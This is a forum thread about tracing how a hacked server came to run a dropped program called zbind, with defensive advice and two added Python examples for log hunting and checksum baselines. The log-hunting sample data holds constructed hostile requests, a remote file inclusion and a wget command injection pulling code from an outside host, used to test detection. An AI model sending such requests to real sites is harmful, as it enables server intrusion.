
Looking for other ideas to find exploit

codesmith

Guest
About 1 week ago we realized our server had sent out about 1500 email messages. Only happened one time, sent as apache user. I looked through all the apache log files at the time of the mails being sent but couldn't find anything suspicious. Or anything else... started a sendmail log and left it at that.

Today, (and I can't believe I didn't see this before) I saw a program called zbind running as apache user. Definitely a baddie, killed it and found that it had been installed in /var/tmp/.a - all apache user. So since that file had a timestamp on it of about 2 weeks ago I looked through all the logs for everything right before that time. Nothing!

Any other ideas on how to find how this exploit happened? So far everything I've seen is as the apache user so hoping there's no root exploit. Ran chkrootkit and it came up ok.
 
Do a grep through all the client's xferlog files, someone could have uploaded it to their account and then sent it to your tmp folder.

If you find nothing, grep through all the access_log files for the name "zbind". Once you find out how they got in, close the hole, remove the app that was used and cancel the account of the client who must have been running an insecure script. With zbind I think your system was compromised, there is no doubt that they have backdoors on your server now, and you should back up all Plesk data and then format and re-install everything. Do not format and re-install until you are confident that you have located the entry point of the exploit or they will just do it again.

you could try something like this:

#grep -r "zbind" /home/httpd/vhosts/*

Or,

#cd /home/httpd/vhosts/
#for i in * ; do grep -r zbind ${i}/httpdocs ; done

Which will produce the same results.


After re-install, immediately secure your tmp partition by editing /etc/fstab like:

LABEL=/tmp /tmp ext3 loop,noexec,nosuid,rw 0 0
#LABEL=/tmp /tmp ext3 defaults 1 2


then install mod_security
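The two log sweeps suggested above (access_log for the program's name, xferlog for an upload under a client account) as a small worked example. This is added code, not part of the thread or of Plesk; the log lines are constructed for the example, and only the indicator "zbind" and the /var/tmp/.a location come from the posts. It also narrows the access_log hits to the window before the dropped file's timestamp, which is the window the original poster was searching, and ranks the client addresses that produced them.

```python
"""Hunt for an indicator (the filename of a dropped program) across Apache
access_log and FTP xferlog text, then rank the source addresses.
Sample log lines are constructed for this example; addresses, vhost names
and dates are made up."""
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote

# Constructed Apache "combined" format lines (not from the original post).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [05/Mar/2007:02:14:09 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Mar/2007:02:14:31 +0000] "GET /gallery.php?page=http://198.51.100.9/zbind.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
198.51.100.44 - - [05/Mar/2007:02:15:02 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.7 - - [05/Mar/2007:02:16:45 +0000] "POST /gallery.php?cmd=wget%20http://198.51.100.9/zbind HTTP/1.1" 200 70 "-" "libwww-perl/5.805"
"""

# Constructed xferlog lines in the wu-ftpd/proftpd layout (not from the post).
SAMPLE_XFERLOG = """\
Mon Mar  5 01:58:12 2007 3 192.0.2.18 42210 /var/www/vhosts/example.com/httpdocs/images/zbind b _ i r client1 ftp 0 * c
Mon Mar  5 01:59:40 2007 1 192.0.2.18 1024 /var/www/vhosts/example.com/httpdocs/images/logo.gif b _ i r client1 ftp 0 * c
Mon Mar  5 10:12:03 2007 2 192.0.2.77 3001 /var/www/vhosts/other.example/httpdocs/zbind.bak b _ o r client2 ftp 0 * c
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_apache_time(text):
    """'05/Mar/2007:02:14:09 +0000' -> timezone-aware datetime."""
    return datetime.strptime(text, "%d/%b/%Y:%H:%M:%S %z")


def find_indicator_hits(access_log_text, indicator):
    """Return access_log entries whose request line, referer or user agent
    mentions the indicator. The request is URL-decoded first so a
    percent-encoded spelling of the name is not missed."""
    hits = []
    needle = indicator.lower()
    for line in access_log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        request = unquote(m["request"])
        haystack = " ".join([request, m["referer"], m["agent"]]).lower()
        if needle in haystack:
            hits.append({"ip": m["ip"], "time": parse_apache_time(m["time"]),
                         "request": request, "status": int(m["status"]),
                         "agent": m["agent"]})
    return hits


def find_ftp_uploads(xferlog_text, indicator):
    """Return xferlog transfers *into* the server (direction 'i') whose file
    name mentions the indicator: a client account may have uploaded the
    program before it was copied to /var/tmp. xferlog fields are
    whitespace-separated and the timestamp occupies the first five."""
    uploads = []
    for line in xferlog_text.splitlines():
        f = line.split()
        if len(f) < 14:
            continue
        timestamp, host, filename, direction, user = (" ".join(f[:5]), f[6],
                                                      f[8], f[11], f[13])
        if direction == "i" and indicator.lower() in filename.lower():
            uploads.append({"time": timestamp, "ip": host,
                            "path": filename, "user": user})
    return uploads


def hits_before(hits, cutoff):
    """Keep only hits earlier than cutoff (e.g. the mtime of /var/tmp/.a)."""
    return [h for h in hits if h["time"] < cutoff]


def rank_sources(hits):
    """Count hits per client address, most active first."""
    return Counter(h["ip"] for h in hits).most_common()


if __name__ == "__main__":
    hits = find_indicator_hits(SAMPLE_ACCESS_LOG, "zbind")
    for h in hits:
        print(h["time"].isoformat(), h["ip"], h["request"])
    print("sources:", rank_sources(hits))
    for u in find_ftp_uploads(SAMPLE_XFERLOG, "zbind"):
        print("upload:", u)
```

On a real Plesk host the same functions would be fed the per-vhost access_log and xferlog files under the vhosts directory; the indicator should be searched URL-decoded, as here, because the raw grep in the post only sees the literal spelling.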
 
In addition, run rkhunter and chkrootkit. We recently had an issue where certain system binaries (ls, cat, ps, etc) were replaced with hacked versions that hid the exploits.

Why, yes, that is nasty.

Actually, it's pretty standard behavior to cover your tracks, but running those 2 programs at regular intervals should help out immensely.
 
Well you should also set up tripwire, and use the auditing functions of your OS to monitor and test the checksums of the binary files. Yes chkrootkit and rkhunter also check sys binaries for md5 checksum differences, but you need to run these before the attack so that it can notice the change.

However, in most cases it is safe to say that once the backdoor is open, you will have a very hard time trying to close it. Don't bother wasting your time trying. It is much easier to close the front door which is how they got in to open the back door in the first place.
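The point above, that a checksum baseline only helps if it was taken while the binaries were still clean, as an added example that is not part of the thread and is not tripwire, rkhunter or chkrootkit. It hashes every regular file under a root, stores the result as JSON, and later reports modified, added and removed files. The demo() function builds a throw-away directory tree standing in for /bin and /usr/bin, so it runs offline; the file names inside it are placeholders chosen to echo the thread (a replaced ls, a dropped file under var/tmp/.a).

```python
"""File-integrity baseline: record checksums while the host is known-good,
keep the record where the host cannot rewrite it, and diff live files
against it later. Added example, not from the thread."""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_of(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map each regular file under root (path relative to root, POSIX
    separators) to its SHA-256. Symlinks are skipped: hashing the target
    would hide a link that had been repointed at a different binary."""
    root = Path(root)
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            baseline[p.relative_to(root).as_posix()] = sha256_of(p)
    return baseline


def save_baseline(baseline, dest):
    """Write the baseline as JSON. In practice dest should be read-only media
    or another host: a baseline kept on the monitored box can be edited by
    whoever replaced the binaries."""
    Path(dest).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src):
    return json.loads(Path(src).read_text())


def compare_to_baseline(baseline, root):
    """Diff the live tree against the baseline: files whose hash changed,
    files absent from the baseline, and baseline files that are gone."""
    current = build_baseline(root)
    modified = sorted(f for f in baseline if f in current and current[f] != baseline[f])
    added = sorted(f for f in current if f not in baseline)
    removed = sorted(f for f in baseline if f not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo():
    """Build a fake /bin, baseline it, then tamper with it the way the thread
    describes: replace 'ls', drop a file in a hidden tmp directory, delete
    'cat'. Returns the comparison result."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "fakeroot"
        for name in ("bin/ls", "bin/cat", "bin/ps", "usr/bin/find"):
            f = root / name
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_bytes(b"placeholder binary " + name.encode())
        baseline_file = Path(tmp) / "baseline.json"  # would live off-host
        save_baseline(build_baseline(root), baseline_file)

        # Simulated tampering after the baseline was taken.
        (root / "bin/ls").write_bytes(b"placeholder binary bin/ls, altered")
        (root / "var/tmp/.a").mkdir(parents=True)
        (root / "var/tmp/.a/zbind").write_bytes(b"dropped program placeholder")
        (root / "bin/cat").unlink()

        return compare_to_baseline(load_baseline(baseline_file), root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run against a live system the baseline would be built from directories such as /bin, /sbin and /usr/bin and compared after every package update as well as on a schedule; a comparison that reports no changes is only meaningful if the stored baseline predates the incident, which is the post's point.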
 